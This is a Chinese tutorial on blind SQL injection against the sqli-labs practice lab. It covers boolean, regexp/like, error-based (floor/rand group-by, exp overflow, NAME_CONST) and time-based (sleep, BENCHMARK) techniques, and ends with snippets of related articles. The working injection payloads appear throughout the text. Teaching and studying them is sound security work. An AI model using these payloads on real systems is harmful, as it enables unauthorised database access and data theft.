Sqlilab盲注基础

1、盲注的概念

盲注就是在sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显到前端页面。例如:sqlilabs-less-5

盲注分三类:基于布尔的盲注、基于时间的盲注、基于报错的盲注

2、常用盲注函数

Left(databse(),1)>‘s‘

Explain:database()显示数据库名称,left(a,b)从左侧截取a 的前b 位

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

Explain:substr(a,b,c)从b 位置开始,截取字符串a 的c 长度。Ascii()将某个字符转换

为ascii 值,其中select table_name information_schema.tables where tables_schema=database()limit 0,1从当前数据库中查找出数据表。

ascii(substr((select database()),1,1))=98

 ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

Explain:mid(a,b,c)从位置b 开始,截取a 字符串的c 位

Ord()函数同ascii(),将字符转为ascii 值

regexp 正则注入

用法介绍:select user() regexp ‘^[a-z]‘;

Explain:正则表达式的用法,user()结果为root,regexp 为匹配root 的正则表达式。匹配user()结果第一个字符是a-z之间的字符。

第二位可以用select user() regexp ‘^ro‘来进行。

select user() regexp ‘^ro[o][o-t]‘判断前2位是否为ro,第三位是否为o,第4位是否为o-t之间字符。

示例介绍:

I  select * from users where id=1 and 1=(if((user() regexp ‘^r‘),1,0));

II select * from users where id=1 and 1=(user() regexp‘^ri‘);

通过if 语句的条件判断,返回一些条件句,比如if 等构造一个判断。根据返回结果是否等于0 或者1 进行判断。

III  select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=‘security‘ and table_name regexp ‘^us[a-z]‘ limit 0,1);

这里利用select 构造了一个判断语句。我们只需要依次更换regexp 表达式即可

‘^u[a-z]‘ -> ‘^us[a-z]‘ -> ‘^use[a-z]‘ -> ‘^user[a-z]‘ -> FALSE

无法判断的情况下,可以用table_name regexp ‘^username$‘来进行判断。^是从开头进行

匹配,$是从结尾开始判断。

like 匹配注入

和上述的正则类似,mysql 在匹配的时候我们可以用ike 进行匹配。

用法:select user() like ‘ro%’

如果是以ro开头,那么返回1,否则返回0

3、基于报错的sql盲注-构造payload返回回显

select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;

explain:此处有三个点,一是需要concat 计数,二是floor,取得0 or 1,进行数据的重复,三是group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释mysql 的bug 的问题。但是此处需要将rand(0),rand()需要多试几次才行。

  执行结果

Error Code : 1062
Duplicate entry ‘::[email protected]::1‘ for key ‘<group_key>‘
(0 ms taken)

说明user()是root,简化上述sql语句如下:

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

   执行结果

Error Code : 1062
Duplicate entry ‘5.7.261‘ for key ‘<group_key>‘
 (0 ms taken)

说明version()是5.7.261

如果表被禁用,可以使用:select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))

如果rand()被禁用,可以使用:select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

 exp函数
select exp(~(select * FROM(SELECT USER())a))

Exp()为以e 为底的对数函数;版本在5.5.5 及其以上 exp(709)大于709的数会返回

Error Code : 1690
DOUBLE value is out of range in ‘exp(710)‘            # 数据溢出错误
(0 ms taken)

对0取反select ~0得到的值是:18446744073709551615>710

Select Exp(~0) 报错:

Error Code : 1690
DOUBLE value is out of range in ‘exp(~(0))‘
(0 ms taken)

结合前面返回0是错误的,来判断注入语句是否正确。

验证版本

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
Error Code : 1060
Duplicate column name ‘5.7.26‘
(0 ms taken)

4、基于时间的盲注-延时注入

 select If(ascii(substr(database(),1,1))>115,0,sleep(5)) --if 判断语句,条件为假,执行sleep

Ps:遇到以下这种利用sleep()延时注入语句

select sleep(find_in_set(mid(@@version, 1, 1), ‘0,1,2,3,4,5,6,7,8,9,.‘));

该语句意思是在0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。

SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG‘,‘by 5 seconds‘)),null) FROM (select database() as current) as tb1;

BENCHMARK(count,expr)用于测试函数的性能,参数1为次数,参数2为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的cpu 资源。推荐使用sleep()函数进行注入。

5、ascii表

原文地址:https://www.cnblogs.com/smartmsl/p/12260696.html

时间: 2024-11-09 05:09:43

Sqlilab盲注基础的相关文章

sql盲注之报错注入(附自动化脚本)

作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入. 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新. 1. Duplicate entry报错: 一句话概括就是多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息. 关键是查询时会建立临时表存储数

SQL盲注注入

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入.盲注一般分为布尔盲注和基于时间的盲注和报错的盲注.本次主要讲解的是基于布尔的盲注. Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 当然如果上面的函数被禁用,也有相应的函数替换.可百度 布尔

sql注入之limit注入和五种时间盲注姿势

0x00前言 limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客..这里还是记录一下吧以后忘了方便复习. 0x01 limit基础知识 照抄前面的: 这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233 使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据 SELECT?*?FROM?table?LIMIT?[offset,]?rows?|?rows OFFSET offset LIMIT 子句可以被用于强制 SELECT

Gxlcms时间盲注+后台任意文件删除读取下载+getshell

前台SQL时间盲注 在前台作品评分处 Lib\Home\Action/CommAction.class.php 第56行 $ting_id = $_GET["id"]; 第133行 $ting_gold = $mod->where("ting_id='$ting_id'")->getField("ting_gold"); 导致了可以时间盲注 因为回显不明确 后台GetShell 后台附件设置处 fuzz过程 输入php  被过滤成空

MYSQL注入天书之盲注讲解

Background-2 盲注的讲解 何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注.从background-1中,我们可以知道盲注分为三类 ?基于布尔SQL盲注 ?基于时间的SQL盲注 ?基于报错的SQL盲注 Ps:知识点太多了,这里只能简单列出来大致讲解一下.(ps:每当看到前辈的奇淫技巧的payload时,能想象到我内心的喜悦么?我真的想细细的写写这一块,但是不知道该怎么写或者小伙伴

详解SQL盲注测试高级技巧

写在前面: 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句,虽然注入并不是什么新技术了.但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进. 正文: 首先来简单介绍一下盲注,盲注是不能通过直接显示的途径来获取数据库数据的方法.在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同).一般情况下,盲注可分为三类. Booleanbase Timebase Errorbase 其中第一类Boolean就是我们最常接触到的普通

小白日记42:kali渗透测试之Web渗透-SQL盲注

SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,SQL注入将无法依据报错信息判断注入语句的执行结果,即为盲注. 思路:既然无法基于报错信息判断结果,基于逻辑真假的不同结果来判断 a.  1' and 1=1--+ b.  1' and 1=2--+    [输入前真后假,无返回,页面没被执行] ###a与b比较,表明存在SQL注

(转)SQL盲注攻击的简单介绍

转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输入用来影响被执行的SQL脚本     根据Chris Anley的定义[2], 当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,这种方法就可以定义

insert后面value可控的盲注(第一次代码审计出漏洞)

这个叫诗龙的cms真的很感谢他的编写人,全站注入~~一些特别白痴的就不说了,这里有一个相对有点意思的 很明显的注入,然后去直接利用报错注入想爆出数据结果发现没有开报错模式. 报错注入http://www.2cto.com/article/201107/96122.html这篇文章写得挺好的. 思路很清楚了,只能盲注. 之前实战确实太少了,values后面的盲注我还是第一次遇到,之前只知道values后面可以直接跟select. 本地先测一发. 这个睡了一分多钟完全是在意料之外,这个原因也没有去深